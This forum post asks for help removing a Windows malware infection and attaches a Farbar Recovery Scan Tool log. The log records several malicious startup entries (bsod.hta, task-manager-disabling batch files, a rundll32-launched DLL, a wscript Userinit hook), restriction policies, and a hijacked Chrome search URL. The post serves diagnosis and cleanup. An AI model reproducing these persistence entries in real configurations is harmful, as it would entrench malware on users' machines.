Hello! Until recently I've been able to combat any and all infections I've gotten but this one is on another level!! I have ran every piece of anti-walware out there but haven't been able to get back to 100%. I'm now not able to have a desktop when the computer loads, just a black screen which I can only enable by CTRL+ALT+DLT, run task manager, file-> run-> explorer.exe. This reloads my desktop, but the virus has added group policies which disable me as an admin. I also see a wsdscript.exe that is running in the background which I cannot get rid of because of the group policy (same with windows defender). Any help would be much appreciated
Below is my FRST64 log, and the 'addition' file that appeared when I ran the scan.
FRST.txt 63.9KB
6 downloads
Addition.txt 73.37KB
5 downloads
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by RoNiN (administrator) on RONIN-LAPTOP (08-04-2016 10:28:19)
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Emsisoft Ltd) C:\Program Files\Emsisoft Anti-Malware\a2service.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\49.0.2623.40\remoting_host.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(MAGIX AG) C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MSIService.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Thrustmaster®) C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\49.0.2623.40\remoting_host.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\mmc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10816544 2010-05-25] (Realtek Semiconductor)
HKLM\...\Run: [THXCfg64] => C:\windows\system32\RunDLL32.exe C:\windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [emsisoft anti-malware] => c:\program files\emsisoft anti-malware\a2guard.exe [9402680 2016-03-24] (Emsisoft Ltd)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-04-13] (Intel Corporation)
HKLM-x32\...\Run: [MGSysCtrl] => C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe [2486272 2010-06-04] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [THX Audio Control Panel] => C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe [1349632 2010-05-16] (Creative Technology Ltd)
HKLM-x32\...\Run: [CitrixReceiver] => "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
HKLM-x32\...\Run: [TkBellExe] => "C:\Users\RoNiN\update\realsched.exe" -osboot
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [407904 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [153952 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [win_en_77] => [X]
HKLM-x32\...\Run: [Rt562@] => C:\WINDOWS\Disable task manager .bat
HKLM-x32\...\Run: [QwaT] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rty01] => C:\WINDOWS\call.vbs
HKLM-x32\...\Run: [TV] => C:\WINDOWS\TV
HKLM-x32\...\Run: [QwaT78] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT21] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rt45] => C:\WINDOWS\auto explore.bat
HKLM-x32\...\Run: [QwaT55] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT22] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaTgg] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT5] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT4] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT1] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [BSOD] => C:\WINDOWS\bsod.hta
HKLM-x32\...\Run: [rst] => C:\WINDOWS\rst.bat
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595480 2016-03-20] (Oracle Corporation)
HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe [55264 2016-03-10] (Malwarebytes)
HKLM-x32\...\RunOnce: [DeleteOnReboot] => C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat [134 2016-04-07] () <===== ATTENTION
HKLM\...\Winlogon: [Userinit] wscript,
Winlogon\Notify\igfxcui: C:\WINDOWS\SYSTEM32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [Google Update] => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [SideSync] => C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe [9580864 2015-10-13] ()
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [MusicManager] => C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\MusicManager.exe [7643136 2015-11-17] (Google Inc.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [wdbext] => rundll32.exe "C:\Users\RoNiN\AppData\Local\wdbext.dll",wdbext <===== ATTENTION
AppInit_DLLs: C:\ProgramData\AppxikenoZ\Volity.dll => No File
AppInit_DLLs-x32: C:\ProgramData\AppxikenoZ\Goldenphase.dll => No File
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{9cc31965-f3ac-45a8-a3c1-a9ad1c45f485}: [DhcpNameServer] 192.168.6.1 64.134.255.2 64.134.255.10
Tcpip\..\Interfaces\{c78fcb73-f14a-4b1e-b0ad-7bf0f8fa0b67}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {A2516833-3348-406A-96A6-26AAA93BF9DE} URL =
SearchScopes: HKLM -> OldSearch URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {0F462454-2A7D-48CE-B2B5-ECD4B55B6026} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {A2516833-3348-406A-96A6-26AAA93BF9DE} URL =
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {C9D867C8-1E65-4F71-970A-C677CAECFCC3} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL =
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2013-04-16] (RealDownloader)
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-01-14] (Microsoft Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {67DABFBF-D0AB-41FA-9C46-CC0F21721616} hxxp://download.divx.com/player/DivXBrowserPlugin.cab
DPF: HKLM-x32 {6C269571-C6D7-4818-BCA4-32A035E8C884} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15101/CTSUEng.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://connect.bedbath.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15112/CTPID.cab
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll [2015-02-06] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-06] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2015-04-08] (Citrix Systems, Inc.)
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll [2011-06-16] (Yahoo! Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\Common Files\Motive\npMotive.dll [2010-11-08] (Alcatel-Lucent)
FF Plugin-x32: @real.com/nppl3260;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nppl3260.dll [2013-07-11] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nprpplugin.dll [2013-07-11] (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll [2013-04-16] (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @veetle.com/veetleCorePlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\plugins\npVeetle.dll [2010-10-15] (Veetle Inc)
FF Plugin-x32: @veetle.com/veetlePlayerPlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\Player\npvlc.dll [2010-09-21] (Veetle Inc)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @nds.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=3 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=9 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: NDS.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF HKLM-x32\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{FCE04E1F-9378-4f39-96F6-5689A9159E45}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-07-11] [not signed]
Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shdefault&prd=smw&pid=s&shr=d&q={searchTerms}&s=Unknown
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
CHR Profile: C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-10-09]
CHR Extension: (Google Drive) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-28]
CHR Extension: (YouTube) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-28]
CHR Extension: (MightyText - SMS from PC & Text from Computer) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkfhfaphfkopdgpbfkebjfcblcafcmpi [2016-01-13]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dliochdbjfkdbacpmhlcpmleaejidimm [2016-03-22]
CHR Extension: (Google Calendar) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2015-10-12]
CHR Extension: (Google Play Music) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\fahmaaghhglfmonjliepjlchgpgfmobi [2016-04-07]
CHR Extension: (Google Sheets) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-11]
CHR Extension: (Chrome Remote Desktop) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2016-03-02]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdijeikdkaembjbdobgfkoidjkpbmlkd [2016-03-02]
CHR Extension: (Google Docs Offline) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-22]
CHR Extension: (Google Keep - notes and lists) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2016-04-07]
CHR Extension: (Facebook Album & Photo Manager) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\lgiedegfmekolcplboelnmfoiefpcpfg [2015-08-15]
CHR Extension: (drumbit) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\mplpmdejoamenolpcojgegminhcnmibo [2016-02-03]
CHR Extension: (WeatherBug) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\njkkjobcechefaoknodniidfjapgfoco [2015-10-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-15]
CHR Extension: (Picasa) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\onlgmecjpnejhfeofkgbfgnmdlipdejb [2015-08-15]
CHR Extension: (Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-15]
